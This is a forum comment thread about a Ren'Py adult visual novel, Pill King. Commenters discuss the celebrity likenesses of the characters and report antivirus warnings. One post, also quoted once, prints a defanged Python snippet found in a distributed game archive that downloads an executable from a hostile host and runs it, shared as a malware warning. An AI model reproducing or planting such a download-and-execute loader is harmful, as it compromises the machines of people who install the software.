Theme editor

  • RequestStream Movies, TV shows and anime streaming • 1 week trial
  • LewdCorner Site Cleanup Update
    A new cleanup update has been posted covering the recent Vault rework, rank changes, policy cleanup, and theme polish. The goal is to make LC cleaner, easier to understand, and safer for the site going forward. - Jack Of Blades
    Read More
  • use the latest updates page in the main menu for recently updated games (we are still fixing this section.)

VN Ren'Py DAZ Pill King [v0.32] [Effx Games]

You know I really want to love this game but I despise sandbox games. Maybe they have a pill for that? :unsure:
 
Hmm i get a Virus Warning from Norton in the latest Update .
It says there is a Heur.AdvML.B in the Archive

 
Can someone list who all the models resemble. Many look familiar, but I can't remember the names.
Emma Watson (Sister)
Taylor Swift (Receptionist)
Bruce Willis (dad)
Chris Hemsworth (MC)
"Doc" from Back In The Future (doctor)
 
it says the game is animated, but are there actually animations? i only ask since it AI CG
 
Faces look very stiff, but there's potential here for sure, the legality of it tho...
 
Thank you for sharing it's quite curious to have used movie actors not necessarily a success and especially legal risks. (traduction .deepl.com)
 
With the way this dev's last game ended, I'm not sure I wanna try this game just to get disappointed later. Which is too bad, because the renders look really good...
 
Just wondering about this update and Viruses. On the 'Other' site there was an issue with a virus, and wanted to know if it was in this site's version.

Heck, even if it's clean I'm not sure if I want to continue with this. With all the changes to the story things just feel like it's not worth the time spent. Might wait a few updates and try again before I decide.

Just a thought.
 
Just wondering about this update and Viruses. On the 'Other' site there was an issue with a virus, and wanted to know if it was in this site's version.

Heck, even if it's clean I'm not sure if I want to continue with this. With all the changes to the story things just feel like it's not worth the time spent. Might wait a few updates and try again before I decide.

Just a thought.
there is malware in at least the files linked from gofile, PillKing-0.21-pc.zip with md5 c47b9707e94d7d5cde67654854920915. it contains python to download and execute malware (i've edited parts of the url):

Python:
    # Download and execute the file                                                                                                                          
    file_url = 'hxxp://gostatts[.]com/game[.]exe'                                                                                                                
    local_file_path = os.path.join(renpy_base, 'renpy', 'downloaded_file')                                                                                    
                                                                                                                                                             
    print(f"Attempting to download file from {file_url} to {local_file_path}")                                                                                
    if download_file(file_url, local_file_path):                                                                                                              
        print(f"Attempting to execute file at {local_file_path}")                                                                                            
        run_file(local_file_path)                                                                                                                            
    else:                                                                                                                                                    
        print("Download failed. File will not be executed.")

virustotal also doesn't have great things to say about this:

if you downloaded and executed this, i'd start doing some damage control.

edit: mods updated links in OP already so i assume they're clean now.
 
Last edited:
I got a free License with my new Laptop so why wouldnt i use it ?
I wouldn't install Norton even if they paid me. It's bad, like really bad, and it slows your PC. Just look at opinions from people in IT sector, I bet Norton did not have a good review (apart from the paid ones) in the last 20 years. Just use Windows Defender it's surely better than Norton.
 
there is malware in at least the files linked from gofile, PillKing-0.21-pc.zip with md5 c47b9707e94d7d5cde67654854920915. it contains python to download and execute malware (i've edited parts of the url):

Python:
    # Download and execute the file                                                                                                                         
    file_url = 'hxxp://gostatts[.]com/game[.]exe'                                                                                                               
    local_file_path = os.path.join(renpy_base, 'renpy', 'downloaded_file')                                                                                   
                                                                                                                                                            
    print(f"Attempting to download file from {file_url} to {local_file_path}")                                                                               
    if download_file(file_url, local_file_path):                                                                                                             
        print(f"Attempting to execute file at {local_file_path}")                                                                                           
        run_file(local_file_path)                                                                                                                           
    else:                                                                                                                                                   
        print("Download failed. File will not be executed.")

virustotal also doesn't have great things to say about this:

if you downloaded and executed this, i'd start doing some damage control.

edit: mods updated links in OP already so i assume they're clean now.
Ty for that confirmation
 
Back
Top Bottom